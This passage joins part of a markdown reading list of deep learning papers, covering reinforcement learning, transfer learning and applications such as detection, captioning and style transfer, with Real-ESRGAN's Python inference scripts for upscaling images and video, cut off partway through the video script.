computing using a neural network with dynamic external memory**." Nature (2016). [[pdf]](https://www.dropbox.com/s/0a40xi702grx3dq/2016-graves.pdf) **(Milestone,combine above papers' ideas)** :star::star::star::star::star: ## 2.6 Deep Reinforcement Learning **[46]** Mnih, Volodymyr, et al. "**Playing atari with deep reinforcement learning**." arXiv preprint arXiv:1312.5602 (2013). [[pdf]](http://arxiv.org/pdf/1312.5602.pdf)) **(First Paper named deep reinforcement learning)** :star::star::star::star: **[47]** Mnih, Volodymyr, et al. "**Human-level control through deep reinforcement learning**." Nature 518.7540 (2015): 529-533. [[pdf]](https://storage.googleapis.com/deepmind-data/assets/papers/DeepMindNature14236Paper.pdf) **(Milestone)** :star::star::star::star::star: **[48]** Wang, Ziyu, Nando de Freitas, and Marc Lanctot. "**Dueling network architectures for deep reinforcement learning**." arXiv preprint arXiv:1511.06581 (2015). [[pdf]](http://arxiv.org/pdf/1511.06581) **(ICLR best paper,great idea)** :star::star::star::star: **[49]** Mnih, Volodymyr, et al. "**Asynchronous methods for deep reinforcement learning**." arXiv preprint arXiv:1602.01783 (2016). [[pdf]](http://arxiv.org/pdf/1602.01783) **(State-of-the-art method)** :star::star::star::star::star: **[50]** Lillicrap, Timothy P., et al. "**Continuous control with deep reinforcement learning**." arXiv preprint arXiv:1509.02971 (2015). [[pdf]](http://arxiv.org/pdf/1509.02971) **(DDPG)** :star::star::star::star: **[51]** Gu, Shixiang, et al. "**Continuous Deep Q-Learning with Model-based Acceleration**." arXiv preprint arXiv:1603.00748 (2016). [[pdf]](http://arxiv.org/pdf/1603.00748) **(NAF)** :star::star::star::star: **[52]** Schulman, John, et al. "**Trust region policy optimization**." CoRR, abs/1502.05477 (2015). [[pdf]](http://www.jmlr.org/proceedings/papers/v37/schulman15.pdf) **(TRPO)** :star::star::star::star: **[53]** Silver, David, et al. "**Mastering the game of Go with deep neural networks and tree search**." Nature 529.7587 (2016): 484-489. [[pdf]](http://willamette.edu/~levenick/cs448/goNature.pdf) **(AlphaGo)** :star::star::star::star::star: ## 2.7 Deep Transfer Learning / Lifelong Learning / especially for RL **[54]** Bengio, Yoshua. "**Deep Learning of Representations for Unsupervised and Transfer Learning**." ICML Unsupervised and Transfer Learning 27 (2012): 17-36. [[pdf]](http://www.jmlr.org/proceedings/papers/v27/bengio12a/bengio12a.pdf) **(A Tutorial)** :star::star::star: **[55]** Silver, Daniel L., Qiang Yang, and Lianghao Li. "**Lifelong Machine Learning Systems: Beyond Learning Algorithms**." AAAI Spring Symposium: Lifelong Machine Learning. 2013. [[pdf]](http://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.696.7800&rep=rep1&type=pdf) **(A brief discussion about lifelong learning)** :star::star::star: **[56]** Hinton, Geoffrey, Oriol Vinyals, and Jeff Dean. "**Distilling the knowledge in a neural network**." arXiv preprint arXiv:1503.02531 (2015). [[pdf]](http://arxiv.org/pdf/1503.02531) **(Godfather's Work)** :star::star::star::star: **[57]** Rusu, Andrei A., et al. "**Policy distillation**." arXiv preprint arXiv:1511.06295 (2015). [[pdf]](http://arxiv.org/pdf/1511.06295) **(RL domain)** :star::star::star: **[58]** Parisotto, Emilio, Jimmy Lei Ba, and Ruslan Salakhutdinov. "**Actor-mimic: Deep multitask and transfer reinforcement learning**." arXiv preprint arXiv:1511.06342 (2015). [[pdf]](http://arxiv.org/pdf/1511.06342) **(RL domain)** :star::star::star: **[59]** Rusu, Andrei A., et al. "**Progressive neural networks**." arXiv preprint arXiv:1606.04671 (2016). [[pdf]](https://arxiv.org/pdf/1606.04671) **(Outstanding Work, A novel idea)** :star::star::star::star::star: ## 2.8 One Shot Deep Learning **[60]** Lake, Brenden M., Ruslan Salakhutdinov, and Joshua B. Tenenbaum. "**Human-level concept learning through probabilistic program induction**." Science 350.6266 (2015): 1332-1338. [[pdf]](http://clm.utexas.edu/compjclub/wp-content/uploads/2016/02/lake2015.pdf) **(No Deep Learning,but worth reading)** :star::star::star::star::star: **[61]** Koch, Gregory, Richard Zemel, and Ruslan Salakhutdinov. "**Siamese Neural Networks for One-shot Image Recognition**."(2015) [[pdf]](http://www.cs.utoronto.ca/~gkoch/files/msc-thesis.pdf) :star::star::star: **[62]** Santoro, Adam, et al. "**One-shot Learning with Memory-Augmented Neural Networks**." arXiv preprint arXiv:1605.06065 (2016). [[pdf]](http://arxiv.org/pdf/1605.06065) **(A basic step to one shot learning)** :star::star::star::star: **[63]** Vinyals, Oriol, et al. "**Matching Networks for One Shot Learning**." arXiv preprint arXiv:1606.04080 (2016). [[pdf]](https://arxiv.org/pdf/1606.04080) :star::star::star: **[64]** Hariharan, Bharath, and Ross Girshick. "**Low-shot visual object recognition**." arXiv preprint arXiv:1606.02819 (2016). [[pdf]](http://arxiv.org/pdf/1606.02819) **(A step to large data)** :star::star::star::star: # 3 Applications ## 3.1 NLP(Natural Language Processing) **[1]** Antoine Bordes, et al. "**Joint Learning of Words and Meaning Representations for Open-Text Semantic Parsing**." AISTATS(2012) [[pdf]](https://www.hds.utc.fr/~bordesan/dokuwiki/lib/exe/fetch.php?id=en%3Apubli&cache=cache&media=en:bordes12aistats.pdf) :star::star::star::star: **[2]** Mikolov, et al. "**Distributed representations of words and phrases and their compositionality**." ANIPS(2013): 3111-3119 [[pdf]](http://papers.nips.cc/paper/5021-distributed-representations-of-words-and-phrases-and-their-compositionality.pdf) **(word2vec)** :star::star::star: **[3]** Sutskever, et al. "**“Sequence to sequence learning with neural networks**." ANIPS(2014) [[pdf]](http://papers.nips.cc/paper/5346-sequence-to-sequence-learning-with-neural-networks.pdf) :star::star::star: **[4]** Ankit Kumar, et al. "**“Ask Me Anything: Dynamic Memory Networks for Natural Language Processing**." arXiv preprint arXiv:1506.07285(2015) [[pdf]](https://arxiv.org/abs/1506.07285) :star::star::star::star: **[5]** Yoon Kim, et al. "**Character-Aware Neural Language Models**." NIPS(2015) arXiv preprint arXiv:1508.06615(2015) [[pdf]](https://arxiv.org/abs/1508.06615) :star::star::star::star: **[6]** Jason Weston, et al. "**Towards AI-Complete Question Answering: A Set of Prerequisite Toy Tasks**." arXiv preprint arXiv:1502.05698(2015) [[pdf]](https://arxiv.org/abs/1502.05698) **(bAbI tasks)** :star::star::star: **[7]** Karl Moritz Hermann, et al. "**Teaching Machines to Read and Comprehend**." arXiv preprint arXiv:1506.03340(2015) [[pdf]](https://arxiv.org/abs/1506.03340) **(CNN/DailyMail cloze style questions)** :star::star: **[8]** Alexis Conneau, et al. "**Very Deep Convolutional Networks for Natural Language Processing**." arXiv preprint arXiv:1606.01781(2016) [[pdf]](https://arxiv.org/abs/1606.01781) **(state-of-the-art in text classification)** :star::star::star: **[9]** Armand Joulin, et al. "**Bag of Tricks for Efficient Text Classification**." arXiv preprint arXiv:1607.01759(2016) [[pdf]](https://arxiv.org/abs/1607.01759) **(slightly worse than state-of-the-art, but a lot faster)** :star::star::star: ## 3.2 Object Detection **[1]** Szegedy, Christian, Alexander Toshev, and Dumitru Erhan. "**Deep neural networks for object detection**." Advances in Neural Information Processing Systems. 2013. [[pdf]](http://papers.nips.cc/paper/5207-deep-neural-networks-for-object-detection.pdf) :star::star::star: **[2]** Girshick, Ross, et al. "**Rich feature hierarchies for accurate object detection and semantic segmentation**." Proceedings of the IEEE conference on computer vision and pattern recognition. 2014. [[pdf]](http://www.cv-foundation.org/openaccess/content_cvpr_2014/papers/Girshick_Rich_Feature_Hierarchies_2014_CVPR_paper.pdf) **(RCNN)** :star::star::star::star::star: **[3]** He, Kaiming, et al. "**Spatial pyramid pooling in deep convolutional networks for visual recognition**." European Conference on Computer Vision. Springer International Publishing, 2014. [[pdf]](http://arxiv.org/pdf/1406.4729) **(SPPNet)** :star::star::star::star: **[4]** Girshick, Ross. "**Fast r-cnn**." Proceedings of the IEEE International Conference on Computer Vision. 2015. [[pdf]](https://pdfs.semanticscholar.org/8f67/64a59f0d17081f2a2a9d06f4ed1cdea1a0ad.pdf) :star::star::star::star: **[5]** Ren, Shaoqing, et al. "**Faster R-CNN: Towards real-time object detection with region proposal networks**." Advances in neural information processing systems. 2015. [[pdf]](https://arxiv.org/pdf/1506.01497.pdf) :star::star::star::star: **[6]** Redmon, Joseph, et al. "**You only look once: Unified, real-time object detection**." arXiv preprint arXiv:1506.02640 (2015). [[pdf]](http://homes.cs.washington.edu/~ali/papers/YOLO.pdf) **(YOLO,Oustanding Work, really practical)** :star::star::star::star::star: **[7]** Liu, Wei, et al. "**SSD: Single Shot MultiBox Detector**." arXiv preprint arXiv:1512.02325 (2015). [[pdf]](http://arxiv.org/pdf/1512.02325) :star::star::star: **[8]** Dai, Jifeng, et al. "**R-FCN: Object Detection via Region-based Fully Convolutional Networks**." arXiv preprint arXiv:1605.06409 (2016). [[pdf]](https://arxiv.org/abs/1605.06409) :star::star::star::star: **[9]** He, Gkioxari, et al. "**Mask R-CNN**" arXiv preprint arXiv:1703.06870 (2017). [[pdf]](https://arxiv.org/abs/1703.06870) :star::star::star::star: **[10]** Bochkovskiy, Alexey, et al. "**YOLOv4: Optimal Speed and Accuracy of Object Detection.**" arXiv preprint arXiv:2004.10934 (2020). [[pdf]](https://arxiv.org/pdf/2004.10934) :star::star::star::star: **[11]** Tan, Mingxing, et al. “**EfficientDet: Scalable and Efficient Object Detection.**" arXiv preprint arXiv:1911.09070 (2019). [[pdf]](https://arxiv.org/pdf/1911.09070) :star::star::star::star::star: ## 3.3 Visual Tracking **[1]** Wang, Naiyan, and Dit-Yan Yeung. "**Learning a deep compact image representation for visual tracking**." Advances in neural information processing systems. 2013. [[pdf]](http://papers.nips.cc/paper/5192-learning-a-deep-compact-image-representation-for-visual-tracking.pdf) **(First Paper to do visual tracking using Deep Learning,DLT Tracker)** :star::star::star: **[2]** Wang, Naiyan, et al. "**Transferring rich feature hierarchies for robust visual tracking**." arXiv preprint arXiv:1501.04587 (2015). [[pdf]](http://arxiv.org/pdf/1501.04587) **(SO-DLT)** :star::star::star::star: **[3]** Wang, Lijun, et al. "**Visual tracking with fully convolutional networks**." Proceedings of the IEEE International Conference on Computer Vision. 2015. [[pdf]](http://www.cv-foundation.org/openaccess/content_iccv_2015/papers/Wang_Visual_Tracking_With_ICCV_2015_paper.pdf) **(FCNT)** :star::star::star::star: **[4]** Held, David, Sebastian Thrun, and Silvio Savarese. "**Learning to Track at 100 FPS with Deep Regression Networks**." arXiv preprint arXiv:1604.01802 (2016). [[pdf]](http://arxiv.org/pdf/1604.01802) **(GOTURN,Really fast as a deep learning method,but still far behind un-deep-learning methods)** :star::star::star::star: **[5]** Bertinetto, Luca, et al. "**Fully-Convolutional Siamese Networks for Object Tracking**." arXiv preprint arXiv:1606.09549 (2016). [[pdf]](https://arxiv.org/pdf/1606.09549) **(SiameseFC,New state-of-the-art for real-time object tracking)** :star::star::star::star: **[6]** Martin Danelljan, Andreas Robinson, Fahad Khan, Michael Felsberg. "**Beyond Correlation Filters: Learning Continuous Convolution Operators for Visual Tracking**." ECCV (2016) [[pdf]](http://www.cvl.isy.liu.se/research/objrec/visualtracking/conttrack/C-COT_ECCV16.pdf) **(C-COT)** :star::star::star::star: **[7]** Nam, Hyeonseob, Mooyeol Baek, and Bohyung Han. "**Modeling and Propagating CNNs in a Tree Structure for Visual Tracking**." arXiv preprint arXiv:1608.07242 (2016). [[pdf]](https://arxiv.org/pdf/1608.07242) **(VOT2016 Winner,TCNN)** :star::star::star::star: ## 3.4 Image Caption **[1]** Farhadi,Ali,etal. "**Every picture tells a story: Generating sentences from images**". In Computer VisionECCV 2010. Springer Berlin Heidelberg:15-29, 2010. [[pdf]](https://www.cs.cmu.edu/~afarhadi/papers/sentence.pdf) :star::star::star: **[2]** Kulkarni, Girish, et al. "**Baby talk: Understanding and generating image descriptions**". In Proceedings of the 24th CVPR, 2011. [[pdf]](http://tamaraberg.com/papers/generation_cvpr11.pdf):star::star::star::star: **[3]** Vinyals, Oriol, et al. "**Show and tell: A neural image caption generator**". In arXiv preprint arXiv:1411.4555, 2014. [[pdf]](https://arxiv.org/pdf/1411.4555.pdf):star::star::star: **[4]** Donahue, Jeff, et al. "**Long-term recurrent convolutional networks for visual recognition and description**". In arXiv preprint arXiv:1411.4389 ,2014. [[pdf]](https://arxiv.org/pdf/1411.4389.pdf) **[5]** Karpathy, Andrej, and Li Fei-Fei. "**Deep visual-semantic alignments for generating image descriptions**". In arXiv preprint arXiv:1412.2306, 2014. [[pdf]](https://cs.stanford.edu/people/karpathy/cvpr2015.pdf):star::star::star::star::star: **[6]** Karpathy, Andrej, Armand Joulin, and Fei Fei F. Li. "**Deep fragment embeddings for bidirectional image sentence mapping**". In Advances in neural information processing systems, 2014. [[pdf]](https://arxiv.org/pdf/1406.5679v1.pdf):star::star::star::star: **[7]** Fang, Hao, et al. "**From captions to visual concepts and back**". In arXiv preprint arXiv:1411.4952, 2014. [[pdf]](https://arxiv.org/pdf/1411.4952v3.pdf):star::star::star::star::star: **[8]** Chen, Xinlei, and C. Lawrence Zitnick. "**Learning a recurrent visual representation for image caption generation**". In arXiv preprint arXiv:1411.5654, 2014. [[pdf]](https://arxiv.org/pdf/1411.5654v1.pdf):star::star::star::star: **[9]** Mao, Junhua, et al. "**Deep captioning with multimodal recurrent neural networks (m-rnn)**". In arXiv preprint arXiv:1412.6632, 2014. [[pdf]](https://arxiv.org/pdf/1412.6632v5.pdf):star::star::star: **[10]** Xu, Kelvin, et al. "**Show, attend and tell: Neural image caption generation with visual attention**". In arXiv preprint arXiv:1502.03044, 2015. [[pdf]](https://arxiv.org/pdf/1502.03044v3.pdf):star::star::star::star::star: ## 3.5 Machine Translation > Some milestone papers are listed in RNN / Seq-to-Seq topic. **[1]** Luong, Minh-Thang, et al. "**Addressing the rare word problem in neural machine translation**." arXiv preprint arXiv:1410.8206 (2014). [[pdf]](http://arxiv.org/pdf/1410.8206) :star::star::star::star: **[2]** Sennrich, et al. "**Neural Machine Translation of Rare Words with Subword Units**". In arXiv preprint arXiv:1508.07909, 2015. [[pdf]](https://arxiv.org/pdf/1508.07909.pdf):star::star::star: **[3]** Luong, Minh-Thang, Hieu Pham, and Christopher D. Manning. "**Effective approaches to attention-based neural machine translation**." arXiv preprint arXiv:1508.04025 (2015). [[pdf]](http://arxiv.org/pdf/1508.04025) :star::star::star::star: **[4]** Chung, et al. "**A Character-Level Decoder without Explicit Segmentation for Neural Machine Translation**". In arXiv preprint arXiv:1603.06147, 2016. [[pdf]](https://arxiv.org/pdf/1603.06147.pdf):star::star: **[5]** Lee, et al. "**Fully Character-Level Neural Machine Translation without Explicit Segmentation**". In arXiv preprint arXiv:1610.03017, 2016. [[pdf]](https://arxiv.org/pdf/1610.03017.pdf):star::star::star::star::star: **[6]** Wu, Schuster, Chen, Le, et al. "**Google's Neural Machine Translation System: Bridging the Gap between Human and Machine Translation**". In arXiv preprint arXiv:1609.08144v2, 2016. [[pdf]](https://arxiv.org/pdf/1609.08144v2.pdf) **(Milestone)** :star::star::star::star: ## 3.6 Robotics **[1]** Koutník, Jan, et al. "**Evolving large-scale neural networks for vision-based reinforcement learning**." Proceedings of the 15th annual conference on Genetic and evolutionary computation. ACM, 2013. [[pdf]](http://repository.supsi.ch/4550/1/koutnik2013gecco.pdf) :star::star::star: **[2]** Levine, Sergey, et al. "**End-to-end training of deep visuomotor policies**." Journal of Machine Learning Research 17.39 (2016): 1-40. [[pdf]](http://www.jmlr.org/papers/volume17/15-522/15-522.pdf) :star::star::star::star::star: **[3]** Pinto, Lerrel, and Abhinav Gupta. "**Supersizing self-supervision: Learning to grasp from 50k tries and 700 robot hours**." arXiv preprint arXiv:1509.06825 (2015). [[pdf]](http://arxiv.org/pdf/1509.06825) :star::star::star: **[4]** Levine, Sergey, et al. "**Learning Hand-Eye Coordination for Robotic Grasping with Deep Learning and Large-Scale Data Collection**." arXiv preprint arXiv:1603.02199 (2016). [[pdf]](http://arxiv.org/pdf/1603.02199) :star::star::star::star: **[5]** Zhu, Yuke, et al. "**Target-driven Visual Navigation in Indoor Scenes using Deep Reinforcement Learning**." arXiv preprint arXiv:1609.05143 (2016). [[pdf]](https://arxiv.org/pdf/1609.05143) :star::star::star::star: **[6]** Yahya, Ali, et al. "**Collective Robot Reinforcement Learning with Distributed Asynchronous Guided Policy Search**." arXiv preprint arXiv:1610.00673 (2016). [[pdf]](https://arxiv.org/pdf/1610.00673) :star::star::star::star: **[7]** Gu, Shixiang, et al. "**Deep Reinforcement Learning for Robotic Manipulation**." arXiv preprint arXiv:1610.00633 (2016). [[pdf]](https://arxiv.org/pdf/1610.00633) :star::star::star::star: **[8]** A Rusu, M Vecerik, Thomas Rothörl, N Heess, R Pascanu, R Hadsell."**Sim-to-Real Robot Learning from Pixels with Progressive Nets**." arXiv preprint arXiv:1610.04286 (2016). [[pdf]](https://arxiv.org/pdf/1610.04286.pdf) :star::star::star::star: **[9]** Mirowski, Piotr, et al. "**Learning to navigate in complex environments**." arXiv preprint arXiv:1611.03673 (2016). [[pdf]](https://arxiv.org/pdf/1611.03673) :star::star::star::star: ## 3.7 Art **[1]** Mordvintsev, Alexander; Olah, Christopher; Tyka, Mike (2015). "**Inceptionism: Going Deeper into Neural Networks**". Google Research. [[html]](https://research.googleblog.com/2015/06/inceptionism-going-deeper-into-neural.html) **(Deep Dream)** :star::star::star::star: **[2]** Gatys, Leon A., Alexander S. Ecker, and Matthias Bethge. "**A neural algorithm of artistic style**." arXiv preprint arXiv:1508.06576 (2015). [[pdf]](http://arxiv.org/pdf/1508.06576) **(Outstanding Work, most successful method currently)** :star::star::star::star::star: **[3]** Zhu, Jun-Yan, et al. "**Generative Visual Manipulation on the Natural Image Manifold**." European Conference on Computer Vision. Springer International Publishing, 2016. [[pdf]](https://arxiv.org/pdf/1609.03552) **(iGAN)** :star::star::star::star: **[4]** Champandard, Alex J. "**Semantic Style Transfer and Turning Two-Bit Doodles into Fine Artworks**." arXiv preprint arXiv:1603.01768 (2016). [[pdf]](http://arxiv.org/pdf/1603.01768) **(Neural Doodle)** :star::star::star::star: **[5]** Zhang, Richard, Phillip Isola, and Alexei A. Efros. "**Colorful Image Colorization**." arXiv preprint arXiv:1603.08511 (2016). [[pdf]](http://arxiv.org/pdf/1603.08511) :star::star::star::star: **[6]** Johnson, Justin, Alexandre Alahi, and Li Fei-Fei. "**Perceptual losses for real-time style transfer and super-resolution**." arXiv preprint arXiv:1603.08155 (2016). [[pdf]](https://arxiv.org/pdf/1603.08155.pdf) :star::star::star::star: **[7]** Vincent Dumoulin, Jonathon Shlens and Manjunath Kudlur. "**A learned representation for artistic style**." arXiv preprint arXiv:1610.07629 (2016). [[pdf]](https://arxiv.org/pdf/1610.07629v1.pdf) :star::star::star::star: **[8]** Gatys, Leon and Ecker, et al."**Controlling Perceptual Factors in Neural Style Transfer**." arXiv preprint arXiv:1611.07865 (2016). [[pdf]](https://arxiv.org/pdf/1611.07865.pdf) **(control style transfer over spatial location,colour information and across spatial scale)**:star::star::star::star: **[9]** Ulyanov, Dmitry and Lebedev, Vadim, et al. "**Texture Networks: Feed-forward Synthesis of Textures and Stylized Images**." arXiv preprint arXiv:1603.03417(2016). [[pdf]](http://arxiv.org/abs/1603.03417) **(texture generation and style transfer)** :star::star::star::star: **[10]** Yijun Li, Ming-Yu Liu ,Xueting Li, Ming-Hsuan Yang,Jan Kautz (NVIDIA). "**A Closed-form Solution to Photorealistic Image Stylization**." arXiv preprint arXiv:1802.06474(2018). [[pdf]](https://arxiv.org/pdf/1802.06474.pdf) **(Very fast and ultra realistic style transfer)** :star::star::star::star: ## 3.8 Object Segmentation **[1]** J. Long, E. Shelhamer, and T. Darrell, “**Fully convolutional networks for semantic segmentation**.” in CVPR, 2015. [[pdf]](https://arxiv.org/pdf/1411.4038v2.pdf) :star::star::star::star::star: **[2]** L.-C. Chen, G. Papandreou, I. Kokkinos, K. Murphy, and A. L. Yuille. "**Semantic image segmentation with deep convolutional nets and fully connected crfs**." In ICLR, 2015. [[pdf]](https://arxiv.org/pdf/1606.00915v1.pdf) :star::star::star::star::star: **[3]** Pinheiro, P.O., Collobert, R., Dollar, P. "**Learning to segment object candidates.**" In: NIPS. 2015. [[pdf]](https://arxiv.org/pdf/1506.06204v2.pdf) :star::star::star::star: **[4]** Dai, J., He, K., Sun, J. "**Instance-aware semantic segmentation via multi-task network cascades**." in CVPR. 2016 [[pdf]](https://arxiv.org/pdf/1512.04412v1.pdf) :star::star::star: **[5]** Dai, J., He, K., Sun, J. "**Instance-sensitive Fully Convolutional Networks**." arXiv preprint arXiv:1603.08678 (2016). [[pdf]](https://arxiv.org/pdf/1603.08678v1.pdf) :star::star::star:
Real-ESRGAN
a4abfb2979a7bbff3f69f58f58ae324608821e27
File: inference_realesrgan.py import argparse import cv2 import glob import os from basicsr.archs.rrdbnet_arch import RRDBNet from basicsr.utils.download_util import load_file_from_url from realesrgan import RealESRGANer from realesrgan.archs.srvgg_arch import SRVGGNetCompact def main(): """Inference demo for Real-ESRGAN. """ parser = argparse.ArgumentParser() parser.add_argument('-i', '--input', type=str, default='inputs', help='Input image or folder') parser.add_argument( '-n', '--model_name', type=str, default='RealESRGAN_x4plus', help=('Model names: RealESRGAN_x4plus | RealESRNet_x4plus | RealESRGAN_x4plus_anime_6B | RealESRGAN_x2plus | ' 'realesr-animevideov3 | realesr-general-x4v3')) parser.add_argument('-o', '--output', type=str, default='results', help='Output folder') parser.add_argument( '-dn', '--denoise_strength', type=float, default=0.5, help=('Denoise strength. 0 for weak denoise (keep noise), 1 for strong denoise ability. ' 'Only used for the realesr-general-x4v3 model')) parser.add_argument('-s', '--outscale', type=float, default=4, help='The final upsampling scale of the image') parser.add_argument( '--model_path', type=str, default=None, help='[Option] Model path. Usually, you do not need to specify it') parser.add_argument('--suffix', type=str, default='out', help='Suffix of the restored image') parser.add_argument('-t', '--tile', type=int, default=0, help='Tile size, 0 for no tile during testing') parser.add_argument('--tile_pad', type=int, default=10, help='Tile padding') parser.add_argument('--pre_pad', type=int, default=0, help='Pre padding size at each border') parser.add_argument('--face_enhance', action='store_true', help='Use GFPGAN to enhance face') parser.add_argument( '--fp32', action='store_true', help='Use fp32 precision during inference. Default: fp16 (half precision).') parser.add_argument( '--alpha_upsampler', type=str, default='realesrgan', help='The upsampler for the alpha channels. Options: realesrgan | bicubic') parser.add_argument( '--ext', type=str, default='auto', help='Image extension. Options: auto | jpg | png, auto means using the same extension as inputs') parser.add_argument( '-g', '--gpu-id', type=int, default=None, help='gpu device to use (default=None) can be 0,1,2 for multi-gpu') args = parser.parse_args() # determine models according to model names args.model_name = args.model_name.split('.')[0] if args.model_name == 'RealESRGAN_x4plus': # x4 RRDBNet model model = RRDBNet(num_in_ch=3, num_out_ch=3, num_feat=64, num_block=23, num_grow_ch=32, scale=4) netscale = 4 file_url = ['https://github.com/xinntao/Real-ESRGAN/releases/download/v0.1.0/RealESRGAN_x4plus.pth'] elif args.model_name == 'RealESRNet_x4plus': # x4 RRDBNet model model = RRDBNet(num_in_ch=3, num_out_ch=3, num_feat=64, num_block=23, num_grow_ch=32, scale=4) netscale = 4 file_url = ['https://github.com/xinntao/Real-ESRGAN/releases/download/v0.1.1/RealESRNet_x4plus.pth'] elif args.model_name == 'RealESRGAN_x4plus_anime_6B': # x4 RRDBNet model with 6 blocks model = RRDBNet(num_in_ch=3, num_out_ch=3, num_feat=64, num_block=6, num_grow_ch=32, scale=4) netscale = 4 file_url = ['https://github.com/xinntao/Real-ESRGAN/releases/download/v0.2.2.4/RealESRGAN_x4plus_anime_6B.pth'] elif args.model_name == 'RealESRGAN_x2plus': # x2 RRDBNet model model = RRDBNet(num_in_ch=3, num_out_ch=3, num_feat=64, num_block=23, num_grow_ch=32, scale=2) netscale = 2 file_url = ['https://github.com/xinntao/Real-ESRGAN/releases/download/v0.2.1/RealESRGAN_x2plus.pth'] elif args.model_name == 'realesr-animevideov3': # x4 VGG-style model (XS size) model = SRVGGNetCompact(num_in_ch=3, num_out_ch=3, num_feat=64, num_conv=16, upscale=4, act_type='prelu') netscale = 4 file_url = ['https://github.com/xinntao/Real-ESRGAN/releases/download/v0.2.5.0/realesr-animevideov3.pth'] elif args.model_name == 'realesr-general-x4v3': # x4 VGG-style model (S size) model = SRVGGNetCompact(num_in_ch=3, num_out_ch=3, num_feat=64, num_conv=32, upscale=4, act_type='prelu') netscale = 4 file_url = [ 'https://github.com/xinntao/Real-ESRGAN/releases/download/v0.2.5.0/realesr-general-wdn-x4v3.pth', 'https://github.com/xinntao/Real-ESRGAN/releases/download/v0.2.5.0/realesr-general-x4v3.pth' ] # determine model paths if args.model_path is not None: model_path = args.model_path else: model_path = os.path.join('weights', args.model_name + '.pth') if not os.path.isfile(model_path): ROOT_DIR = os.path.dirname(os.path.abspath(__file__)) for url in file_url: # model_path will be updated model_path = load_file_from_url( url=url, model_dir=os.path.join(ROOT_DIR, 'weights'), progress=True, file_name=None) # use dni to control the denoise strength dni_weight = None if args.model_name == 'realesr-general-x4v3' and args.denoise_strength != 1: wdn_model_path = model_path.replace('realesr-general-x4v3', 'realesr-general-wdn-x4v3') model_path = [model_path, wdn_model_path] dni_weight = [args.denoise_strength, 1 - args.denoise_strength] # restorer upsampler = RealESRGANer( scale=netscale, model_path=model_path, dni_weight=dni_weight, model=model, tile=args.tile, tile_pad=args.tile_pad, pre_pad=args.pre_pad, half=not args.fp32, gpu_id=args.gpu_id) if args.face_enhance: # Use GFPGAN for face enhancement from gfpgan import GFPGANer face_enhancer = GFPGANer( model_path='https://github.com/TencentARC/GFPGAN/releases/download/v1.3.0/GFPGANv1.3.pth', upscale=args.outscale, arch='clean', channel_multiplier=2, bg_upsampler=upsampler) os.makedirs(args.output, exist_ok=True) if os.path.isfile(args.input): paths = [args.input] else: paths = sorted(glob.glob(os.path.join(args.input, '*'))) for idx, path in enumerate(paths): imgname, extension = os.path.splitext(os.path.basename(path)) print('Testing', idx, imgname) img = cv2.imread(path, cv2.IMREAD_UNCHANGED) if len(img.shape) == 3 and img.shape[2] == 4: img_mode = 'RGBA' else: img_mode = None try: if args.face_enhance: _, _, output = face_enhancer.enhance(img, has_aligned=False, only_center_face=False, paste_back=True) else: output, _ = upsampler.enhance(img, outscale=args.outscale) except RuntimeError as error: print('Error', error) print('If you encounter CUDA out of memory, try to set --tile with a smaller number.') else: if args.ext == 'auto': extension = extension[1:] else: extension = args.ext if img_mode == 'RGBA': # RGBA images should be saved in png format extension = 'png' if args.suffix == '': save_path = os.path.join(args.output, f'{imgname}.{extension}') else: save_path = os.path.join(args.output, f'{imgname}_{args.suffix}.{extension}') cv2.imwrite(save_path, output) if __name__ == '__main__': main() File: inference_realesrgan_video.py import argparse import cv2 import glob import mimetypes import numpy as np import os import shutil import subprocess import torch from basicsr.archs.rrdbnet_arch import RRDBNet from basicsr.utils.download_util import load_file_from_url from os import path as osp from tqdm import tqdm from realesrgan import RealESRGANer from realesrgan.archs.srvgg_arch import SRVGGNetCompact try: import ffmpeg except ImportError: import pip pip.main(['install', '--user', 'ffmpeg-python']) import ffmpeg def get_video_meta_info(video_path): ret = {} probe = ffmpeg.probe(video_path) video_streams = [stream for stream in probe['streams'] if stream['codec_type'] == 'video'] has_audio = any(stream['codec_type'] == 'audio' for stream in probe['streams']) ret['width'] = video_streams[0]['width'] ret['height'] = video_streams[0]['height'] ret['fps'] = eval(video_streams[0]['avg_frame_rate']) ret['audio'] = ffmpeg.input(video_path).audio if has_audio else None ret['nb_frames'] = int(video_streams[0]['nb_frames']) return ret def get_sub_video(args, num_process, process_idx): if num_process == 1: return args.input meta = get_video_meta_info(args.input) duration = int(meta['nb_frames'] / meta['fps']) part_time = duration // num_process print(f'duration: {duration}, part_time: {part_time}') os.makedirs(osp.join(args.output, f'{args.video_name}_inp_tmp_videos'), exist_ok=True) out_path = osp.join(args.output, f'{args.video_name}_inp_tmp_videos', f'{process_idx:03d}.mp4') cmd = [ args.ffmpeg_bin, f'-i {args.input}', '-ss', f'{part_time * process_idx}', f'-to {part_time * (process_idx + 1)}' if process_idx != num_process - 1 else '', '-async 1', out_path, '-y' ] print(' '.join(cmd)) subprocess.call(' '.join(cmd), shell=True) return out_path class Reader: def __init__(self, args, total_workers=1, worker_idx=0): self.args = args input_type = mimetypes.guess_type(args.input)[0] self.input_type = 'folder' if input_type is None else input_type self.paths = [] # for image&folder type self.audio = None self.input_fps = None if self.input_type.startswith('video'): video_path = get_sub_video(args, total_workers, worker_idx) self.stream_reader = ( ffmpeg.input(video_path).output('pipe:', format='rawvideo', pix_fmt='bgr24', loglevel='error').run_async( pipe_stdin=True, pipe_stdout=True, cmd=args.ffmpeg_bin)) meta = get_video_meta_info(video_path) self.width = meta['width'] self.height = meta['height'] self.input_fps = meta['fps'] self.audio = meta['audio'] self.nb_frames = meta['nb_frames'] else: if self.input_type.startswith('image'): self.paths = [args.input] else: paths = sorted(glob.glob(os.path.join(args.input, '*'))) tot_frames = len(paths) num_frame_per_worker = tot_frames // total_workers + (1 if tot_frames % total_workers else 0) self.paths = paths[num_frame_per_worker * worker_idx:num_frame_per_worker * (worker_idx + 1)] self.nb_frames = len(self.paths) assert self.nb_frames > 0, 'empty folder' from PIL import Image tmp_img = Image.open(self.paths[0]) self.width, self.height = tmp_img.size self.idx = 0 def get_resolution(self): return self.height, self.width def get_fps(self): if self.args.fps is not None: return self.args.fps elif self.input_fps is not None: return self.input_fps return 24 def get_audio(self): return self.audio def __len__(self): return self.nb_frames def get_frame_from_stream(self): img_bytes = self.stream_reader.stdout.read(self.width * self.height * 3) # 3 bytes for one pixel if not img_bytes: return None img = np.frombuffer(img_bytes, np.uint8).reshape([self.height, self.width, 3]) return img def get_frame_from_list(self): if self.idx >= self.nb_frames: return None img = cv2.imread(self.paths[self.idx]) self.idx += 1 return img def 